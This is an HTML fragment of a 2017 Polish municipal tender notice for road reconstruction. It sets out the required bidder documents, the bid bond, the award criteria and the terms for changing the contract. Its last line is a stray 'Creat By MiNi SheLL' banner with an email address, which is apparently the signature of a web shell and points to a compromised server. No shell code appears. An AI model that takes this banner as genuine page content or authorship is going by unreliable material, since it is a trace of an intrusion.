                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1)	informację z Krajowego Rejestru Karnego w zakresie określonym w art. 24 ust. 1 pkt 13, 14 i 21 ustawy Pzp oraz, odnośnie skazania za wykroczenie na karę aresztu, w zakresie określonym przez zamawiającego na podstawie art. 24 ust. 5 pkt 5 i 6 ustawy Pzp, wystawionej nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu;
2)	zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzającego, że wykonawca nie zalega z opłacaniem podatków, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem podatkowym w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
3)	zaświadczenie właściwej terenowej jednostki organizacyjnej Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, wystawionego nie wcześniej niż 3 miesiące przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, lub innego dokumentu potwierdzającego, że wykonawca zawarł porozumienie z właściwym organem w sprawie spłat tych należności wraz z ewentualnymi odsetkami lub grzywnami, w szczególności uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu;
4)	odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt 1 ustawy Pzp.
Wykonawca, który polega na zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, przedstawi w odniesieniu do tych podmiotów dokumenty o których mowa w pkt 1)-4)</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />1)	wykaz osób, skierowanych przez wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za świadczenie usług lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami, z wykorzystaniem wzoru  załącznik nr 5.
W celu oceny, czy wykonawca polegając na zdolnościach innych podmiotów na zasadach określonych w art. 22a ustawy Pzp, będzie dysponował niezbędnymi zasobami w stopniu umożliwiającym należyte wykonanie zamówienia publicznego oraz oceny, czy stosunek łączący wykonawcę z tymi podmiotami gwarantuje rzeczywisty dostęp do ich zasobów, Zamawiający żąda:
2)	dokumentów określających w szczególności:
a) 	zakres dostępnych wykonawcy zasobów innego podmiotu,
b)	sposób wykorzystania zasobów innego podmiotu, przez wykonawcę, przy wykonywaniu zamówienia publicznego,
c) 	zakres i okres udziału innego podmiotu przy wykonywaniu zamówienia publicznego,
d)	czy podmiot, na zdolnościach którego wykonawca polega w odniesieniu do warunków udziału w postępowaniu dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizuje roboty budowlane lub usługi, których wskazane zdolności dotyczą<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px"></div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. 
Zamawiający wymaga wniesienia wadium.
2. 
Wadium wnosi się przed upływem terminu składania ofert i obejmować musi okres związania ofertą.
3. 
Składając ofertę, każdy Wykonawca zobowiązany jest wnieść wadium w wysokości: 20 000,00 zł, słownie: dwadzieścia tysięcy złotych, groszy 00/100.
4. 
Wadium może być wnoszone w jednej lub kilku następujących formach: 
-	pieniądzu, 
-	poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym, 
-	gwarancjach bankowych, 
-	gwarancjach ubezpieczeniowych, 
-	poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości. 
5. 
Wadium wnoszone w pieniądzu należy wpłacić przelewem na rachunek bankowy Zamawiającego: 94 8526 0001 0000 0130 2000 0006 z dopiskiem Wadium  Przebudowa dróg gminnych 2017.
6. 
Wadium w formie pieniężnej należy wpłacić na tyle wcześniej, żeby w momencie upływu terminu składania ofert wadium było zaksięgowane na rachunku Zamawiającego. Zamawiający stwierdzi wniesienie wadium na podstawie informacji banku prowadzącego ww. rachunek.
7. 
Wadium wniesione w formie innej niż pieniężnej należy złożyć w oryginale, razem z ofertą. 
8.
Polisa, poręczenie, gwarancja lub inny dokument stanowiący formę wadium winny zawierać stwierdzenie, że na pierwsze pisemne żądanie Zamawiającego wzywające do zapłaty kwoty wadium zgodnie z warunkami specyfikacji istotnych warunków zamówienia, następuje jego bezwarunkowa wypłata bez jakichkolwiek zastrzeżeń ze strony gwaranta/poręczyciela. 


9.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli wykonawca w odpowiedzi na wezwanie, o którym mowa w art. 26 ust. 3 i 3a ustawy Pzp, z przyczyn leżących po jego stronie, nie złożył oświadczeń lub dokumentów potwierdzających okoliczności, o których mowa w art. 25 ust. 1 ustawy Pzp, oświadczenia, o którym mowa w art. 25a ust. 1 ustawy Pzp, pełnomocnictw lub nie wyraził zgody na poprawienie omyłki, o której mowa w art. 87 ust. 2 pkt 3 ustawy Pzp, co spowodowało brak możliwości wybrania oferty złożonej przez wykonawcę jako najkorzystniejszej.
10.
Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca, którego oferta została wybrana:
a)	odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych w ofercie,
b)	nie wniósł wymaganego zabezpieczenia należytego wykonania umowy,
c)	zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn leżących po stronie Wykonawcy</div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Najniższa cena</td><td>60</td></tr><tr><td>Okres gwarancji</td><td>30</td></tr><tr><td>Doświadczenie kierownika robót</td><td>10</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1.	Zamawiający przewiduje możliwość zmiany umowy w zakresie opisanym w art. 144 ustawy Pzp oraz następujących istotnych warunków niniejszej umowy:
1)	termin wykonania umowy, gdy w trakcie realizacji zadania:
a)	wystąpią nadzwyczajne i nietypowe warunki atmosferyczne uniemożliwiające Wykonawcy wykonanie robót powodujące przerwanie robót budowlanych na okres nie krótszy niż 7 dni,
b)	roboty zostaną wstrzymane przez uprawniony organ z przyczyn niezależnych od Wykonawcy,
c)	wystąpi siła wyższa uniemożliwiająca wykonanie przedmiotu umowy w terminie.
Wprowadzenie tych zmian może nastąpić pod warunkiem powiadomienia drugiej strony na piśmie w terminie do 3 dni od stwierdzenia, że zaistniała jedna z ww. okoliczności.
2)	skrócenie terminu płatności za wykonane roboty, gdy zajdzie konieczność wcześniejszego wydatkowania pieniędzy związanych z ww. inwestycją;
Wprowadzenie tych zmian może nastąpić pod warunkiem potwierdzenia przez Skarbnika Gminy posiadania środków do zapłaty w krótszym terminie płatności.
3)	inne warunki umowy, gdy w trakcie realizacji zadania:
a)	wystąpi konieczność zmiany w nazwie inwestycji (przedmiocie umowy),
b)	Wykonawca wystąpi o zmianę Kierownika robót  zmiana zostanie zaakceptowana pod warunkiem że zastępca będzie posiadał odpowiednie uprawnienia budowlane i spełni warunki określone w ofercie dla kierownika robót,
c)	wykonawca wprowadzi na budowę podwykonawców w zakresie nie zgłoszonym w złożonej ofercie,
d)	nastąpi zmiana lub rezygnacja z podwykonawców, na których zasoby wykonawca powoływał się w złożonej ofercie; Zamawiający zaakceptuje proponowane rozwiązanie jedynie w przypadku, gdy Wykonawca wykaże, że w chwili złożenia wniosku o zmianę umowy w tym zakresie, proponowany inny podwykonawca lub wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby powoływał się w trakcie postepowania o udzielenie zamówienia; ponadto Wykonawca przedstawi oświadczenie lub oświadczenia lub dokumenty potwierdzające brak podstaw do wykluczenia wobec tego podwykonawcy, jeżeli Zamawiający stwierdzi, że wobec danego podwykonawcy zachodzą podstawy wykluczenia, wykonawca obowiązany jest zastąpić tego podwykonawcę lub zrezygnować z powierzenia części zamówienia podwykonawcy,
e)	wystąpi konieczność wprowadzenia innych zmian, które są konieczne do wprowadzenia, a nie dało się ich przewidzieć w chwili zawarcia umowy oraz są korzystne dla Zamawiającego.
Wprowadzenie tych zmian może nastąpić pod warunkiem powiadomienia drugiej strony na piśmie w terminie do 3 dni od stwierdzenia, że zaistniała jedna z ww. okoliczności oraz potwierdzenia tej sytuacji przez obie strony<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 03/03/2017, godzina: 09:45,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Język polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com